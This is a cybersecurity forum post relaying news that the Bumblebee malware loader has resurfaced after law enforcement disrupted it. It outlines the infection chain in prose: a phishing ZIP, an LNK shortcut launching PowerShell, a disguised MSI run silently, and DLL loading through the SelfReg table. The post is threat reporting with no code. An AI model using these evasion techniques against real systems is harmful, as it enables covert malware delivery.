Malware News Bumblebee malware returns after recent law enforcement disruption

Gandalf_The_Grey

Level 83
Thread author
Verified
Honorary Member
Top Poster
Content Creator
Well-known
Apr 24, 2016
7,345
The Bumblebee malware loader has been spotted in new attacks recently, more than four months after Europol disrupted it during 'Operation Endgame' in May.

Believed to be the creation of TrickBot developers, the malware emerged in 2022 as a replacement for the BazarLoader backdoor to provide ransomware threat actors access to victim networks.

Bumblebee typically achieves infection via phishing, malvertising, and SEO poisoning that promoted various software (e.g. Zooom, Cisco AnyConnect, ChatGPT, and Citrix Workspace).

Among the payloads typically delivered by Bumblebee are Cobalt Strike beacons, information-stealing malware, and various ransomware strains.

In May, an international law enforcement operation codenamed 'Operation Endgame' seized over a hundred servers supporting the multiple malware loader operations, including IcedID, Pikabot, Trickbot, Bumblebee, Smokeloader, and SystemBC.

Ever since, Bumblebee went silent. However, researchers at cybersecurity company Netskope observed new Bumblebee activity tied to the malware, which could indicate a resurgence.
The most recent Bumblebee attack chain starts with a phishing email that lures the victim to download a malicious ZIP archive.

The compressed file contains a .LNK shortcut named Report-41952.lnk, which triggers PowerShell to download a malicious .MSI file (y.msi) disguised as a legitimate NVIDIA driver update or Midjourney installer from a remote server.

The MSI file is then executed silently using msiexec.exe with the /qn option, which ensures that the process runs without any user interaction.

To avoid spawning new processes, which is noisier, the malware uses the SelfReg table within the MSI structure, which instructs msiexec.exe to load the DLL into its own address space and to invoke its DllRegisterServer function.

Once the DLL is loaded and executed, the malware's unpacking process begins, leading to the deployment of Bumblebee in memory.
 
  • Like
Reactions: harlan4096

About us

  • MalwareTips is a community-driven platform providing the latest information and resources on malware and cyber threats. Our team of experienced professionals and passionate volunteers work to keep the internet safe and secure. We provide accurate, up-to-date information and strive to build a strong and supportive community dedicated to cybersecurity.

User Menu

Follow us

Follow us on Facebook or Twitter to know first about the latest cybersecurity incidents and malware threats.

Top